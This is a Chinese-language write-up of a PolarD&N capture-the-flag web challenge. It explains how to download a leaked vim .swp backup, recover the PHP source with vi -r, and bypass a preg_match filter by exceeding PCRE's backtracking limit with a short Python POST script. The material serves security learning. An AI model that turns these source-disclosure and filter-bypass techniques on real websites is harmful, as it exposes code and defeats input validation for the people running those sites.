PolarD&N .swp

题目名称.swp

啥是swp文件勒？

• 当用vim打开文件，但是终端异常退出时系统会产生一个.文件名swp的文件。
• 当源文件被意外删除时，可以利用swp文件恢复源文件

恢复源文件

正常URL:xxx/m.php
则尝试URL:xxx/.m.php.swp下载swp文件代码
假设你的swp文件叫.m.php.swp
可用带-r参数编辑#vi -r m.php
然后wq保存即可

function jiuzhe($xdmtql){ //接受一个xdmtql变量
return preg_match('/sys.*nb/is',$xdmtql); //匹配变量
}
$xdmtql=@$_POST['xdmtql'];
if(!is_array($xdmtql)){ //判断变量是否为数组类型，不为数组类型往下判断
if(!jiuzhe($xdmtql)){//利用jiuzhe函数进行匹配输入的值
if(strpos($xdmtql,'sys nb')!==false){ //绕过 preg_match函数后匹配变量，匹配到的话输出flag
echo 'flag{*******}';
}else{
echo 'true .swp file?';
}
}
else
{ echo 'nijilenijile'; //匹配到/sys.*nb/is的话输出
}
}

首先网站用post方式接受了一个xdmtql变量，用if判断变量是否是数组，不是数组接下来交给jiuzhe函数，这个函数的作用是去匹配变量里的sys nb，匹配到了就输出nijilenijile，没有匹配到就进入下一个if语句，strpos这个函数的作用是匹配sys nb如果匹配到了，就输出ture然后由于有!所以变成false条件成立输出flag

这段代码的重点是如何同时绕过pre_match和strpos函数，一个不让匹配到，一个又要匹配到。这里就涉及到一个回溯问题，就是pre_match函数处理的字符长度有限，如果超过这个长度就会返回false也就是没有匹配到，所以我们写一段代码

import requests
data = {"xdmtql": "sys nb" + "aaaaa" * 1000000}
res = requests.post('自己的网址', data=data, allow_redirects=False)
print(res.content)